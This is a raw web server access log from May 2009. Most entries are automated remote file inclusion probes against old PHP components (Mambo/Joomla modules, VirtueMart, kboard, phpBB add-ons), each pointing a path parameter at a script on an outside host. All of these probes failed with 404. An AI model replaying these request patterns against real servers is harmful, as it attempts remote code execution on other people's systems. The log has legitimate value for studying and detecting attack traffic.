60.251.217.4 - - [08/May/2009:03:34:07 -0400] "GET /errors.php?error=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
60.251.217.4 - - [08/May/2009:03:34:08 -0400] "GET /logs/errors.php?error=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
89.111.184.103 - - [08/May/2009:03:34:10 -0400] "GET /logs/access_log.Q108121800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:03:34:10 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:03:34:12 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
60.251.217.4 - - [08/May/2009:03:34:12 -0400] "GET /logs/error_log.Q108121400/errors.php?error=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
77.221.130.6 - - [08/May/2009:03:34:34 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
77.221.130.6 - - [08/May/2009:03:34:34 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
77.221.130.6 - - [08/May/2009:03:34:35 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
85.214.34.244 - - [08/May/2009:03:34:37 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
85.214.34.244 - - [08/May/2009:03:34:38 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
121.254.231.239 - - [08/May/2009:03:34:42 -0400] "GET /logs/access_log.Q108061000%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:34:42 -0400] "GET /logs/access_log.Q108100700%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
190.248.10.179 - - [08/May/2009:03:34:44 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.boredfree.com/bistro/yes.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
190.248.10.179 - - [08/May/2009:03:34:44 -0400] "GET /logs/access_log.Q108100400//index.php?DOCUMENT_ROOT=http://www.boredfree.com/bistro/yes.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
190.248.10.179 - - [08/May/2009:03:34:44 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.boredfree.com/bistro/yes.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
190.248.10.179 - - [08/May/2009:03:34:46 -0400] "GET /logs/access_log.Q108102500//index.php?DOCUMENT_ROOT=http://www.boredfree.com/bistro/yes.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
218.249.36.194 - - [08/May/2009:03:34:48 -0400] "GET /logs/access_log.Q108122800%20%20/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:01 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:01 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:01 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:01 -0400] "GET /logs/access_log.Q108122800%20%20/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:01 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:01 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:05 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:05 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:05 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.111.184.103 - - [08/May/2009:03:35:12 -0400] "GET /logs/access_log.Q108121000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
174.143.40.251 - - [08/May/2009:03:35:17 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:35:35 -0400] "GET /logs/error_log.Q108122800%20%20/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:35:43 -0400] "GET /logs/access_log.Q109042500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
89.111.184.103 - - [08/May/2009:03:36:04 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:36:10 -0400] "GET /logs/access_log.Q108060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:36:10 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:03:36:10 -0400] "GET /logs/access_log.Q108022600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
60.251.217.4 - - [08/May/2009:03:36:20 -0400] "GET /logs/error_log.Q108121400/errors.php?error=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
89.111.184.103 - - [08/May/2009:03:36:42 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.111.184.103 - - [08/May/2009:03:36:42 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.111.184.103 - - [08/May/2009:03:36:42 -0400] "GET /logs/access_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.24.179.204 - - [08/May/2009:03:36:56 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/test.txt? HTTP/1.0" 404 250 "-" "libwww-perl/5.803"
77.221.130.6 - - [08/May/2009:03:37:03 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:03:37:03 -0400] "GET /logs/access_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:03:37:03 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:03:37:29 -0400] "GET /logs/access_log.Q108122400//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:03:37:29 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
174.143.40.251 - - [08/May/2009:03:37:29 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:37:29 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:37:29 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:03:37:29 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
69.93.90.162 - - [08/May/2009:03:37:42 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:37:42 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.93.90.162 - - [08/May/2009:03:37:42 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.93.90.162 - - [08/May/2009:03:37:42 -0400] "GET /logs/access_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:03:37:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.153.199.56 - - [08/May/2009:03:37:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19"
203.153.199.56 - - [08/May/2009:03:37:57 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19"
86.54.102.45 - - [08/May/2009:03:38:08 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:38:08 -0400] "GET /logs/access_log.Q109041200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:38:08 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:38:12 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
75.125.245.26 - - [08/May/2009:03:38:14 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
75.125.245.26 - - [08/May/2009:03:38:14 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
86.54.102.45 - - [08/May/2009:03:38:26 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:38:26 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:38:26 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.204.25.53 - - [08/May/2009:03:38:30 -0400] "GET /logs/access_log.Q108122400//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:03:38:30 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:03:38:30 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:03:38:32 -0400] "GET /logs/access_log.Q108122400//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:03:38:32 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:03:38:33 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
77.221.130.6 - - [08/May/2009:03:38:39 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
86.54.102.45 - - [08/May/2009:03:38:43 -0400] "GET /logs/access_log.Q109040300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.145.92 - - [08/May/2009:03:38:56 -0400] "GET /logs/access_log.Q108122300//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
89.111.184.103 - - [08/May/2009:03:39:35 -0400] "GET /logs/error_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:39:42 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:39:51 -0400] "GET /logs/access_log.Q109040300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:40:04 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:40:04 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.199.222.19 - - [08/May/2009:03:40:13 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.199.222.19 - - [08/May/2009:03:40:13 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
217.199.222.19 - - [08/May/2009:03:40:13 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:03:40:38 -0400] "GET /logs/error_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:40:39 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:40:39 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:03:40:48 -0400] "GET /logs/error_log.Q108031600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.93.90.162 - - [08/May/2009:03:41:03 -0400] "GET /logs/error_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:03:41:34 -0400] "GET /logs/error_log.Q108061400/errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:03:41:37 -0400] "GET /errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:03:41:37 -0400] "GET /logs/errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:42:02 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:42:03 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:42:03 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:03:42:13 -0400] "GET /images/items/index6_splashshlds.jpg HTTP/1.1" 200 4065 "-" "Googlebot-Image/1.0"
217.199.222.19 - - [08/May/2009:03:42:18 -0400] "GET /logs/access_log.Q109041500%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:42:27 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.29.68.196 - - [08/May/2009:03:42:32 -0400] "GET //includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.29.68.196 - - [08/May/2009:03:42:32 -0400] "GET /logs//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.29.68.196 - - [08/May/2009:03:42:32 -0400] "GET /logs/access_log.Q108090900//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.199.222.19 - - [08/May/2009:03:42:39 -0400] "GET /logs/access_log.Q109041900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:03:42:45 -0400] "GET /logs/error_log.Q108012100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [08/May/2009:03:42:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.54.98 - - [08/May/2009:03:42:50 -0400] "GET /logs/access_log.Q109040300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:43:11 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:43:11 -0400] "GET /logs/access_log.Q109041200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:43:11 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:43:24 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:03:43:24 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
